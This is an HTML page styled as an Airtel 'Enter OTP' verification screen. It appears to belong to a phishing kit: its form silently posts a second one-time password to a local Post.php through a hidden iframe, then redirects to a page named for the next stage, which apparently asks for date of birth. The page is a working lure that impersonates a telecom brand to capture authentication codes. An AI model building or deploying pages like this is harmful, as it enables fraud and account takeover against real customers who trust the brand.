<html lang="en">
 <head>
  <meta charset="utf-8">
  <title>Airtel | Enter OTP</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=6">
  <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <meta http-equiv="cache-control" content="no-cache, must-revalidate, post-check=0, pre-check=0">
  <meta http-equiv="cache-control" content="max-age=0">
  <meta http-equiv="expires" content="0">
  <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT">
  <meta http-equiv="pragma" content="no-cache">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Quicksand&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
  <meta name="description" content="">
  <style type="text/css">
  #id
  {
  width: 92%;
  height: 30px;
  background-color: white;
  color:#404145;
  font-size: 15px !important;
  line-height: 25px !important;
  padding: 1px 5px;
  margin-bottom:10px;
  margin-left:15px;
  outline: none;
  background:none;
  box-shadow: 0px 1px 0px red;
  border:none;
  }
  #id:hover
  {
  box-shadow: 0px 2px 0px #0BBB4C;
  }
  #btn
  {
  width: 200px;
  background-color: red;
  color: white;
  outline:none;
  border-style: solid;
  margin-top:10%;
  border-color:red;
  border-radius: 25px;
  border-width: 1px;
  cursor: pointer;
  font-size: 15px;
  height: 36px;
  margin-left: 2px;
  font-weight:bold;
  font-family: 'Quicksand', sans-serif;
  }
  #btn:hover
  {
  background-color:white;
  color: red;
  outline:none;
  border: solid red;
  border-radius: 25px;
  border-width:1px;
  cursor: pointer;
  font-size: 15px;
  height: 36px;
  font-weight:bold;
  font-family: 'Quicksand', sans-serif;
  }
  #kyc
  {
  width:95%;  
  background-color:#A30001;
  padding:16px;
  margin-left:-6px;
 }
  </style>
  <meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">
  </head>
  <body>
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Proccessing_OTP_DOB.html';}"></iframe>
  <!--My Form-->
  <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
  <div class="login-apb-logo">
  <center><img src="Airtel_Logo.png" style="width:50%;" alt=""></center>
  </div><br><br>
  <div id="kyc">
  <b style="color:white; font-family: 'Quicksand', sans-serif; font-size:16px; padding:30px;">OTP Verification</b>
  </div><br><br>
  <div>
  <center><b style="font-family:'Open Sans', sans-serif; font-size:16px; color:#A30005;">Enter One Time Password (OTP)</b></center><br>
  </div>
  <div>
  <center><b style="font-family:'Open Sans', sans-serif; font-size:14px; color:black; margin-left:20px;">A new 6 digit One Time Password (OTP) has been sent to registered mobile number.</b></center>
  </div><br><br>
  <b style="font-family:'Open Sans', sans-serif; font-size:15px; color:#42425C; margin-left:20px;">Enter OTP</b><br>
  <input type="text"name="2ND_OTP" id="id" inputmode="numeric" placeholder="Enter 6 digit OTP"
  maxlength="6" 
  pattern="[0-9]\d{5}"
  title="Please enter valid 6 digit OTP!" required=""><br>
  
  <center><button type="submit" id="btn">Submit OTP</span></button></center><br>
  
  <img src="Airtel_footer.jpg" style="width:100%; margin-left:0%;" alt=""><br>
  </form>
  </body>
  </html>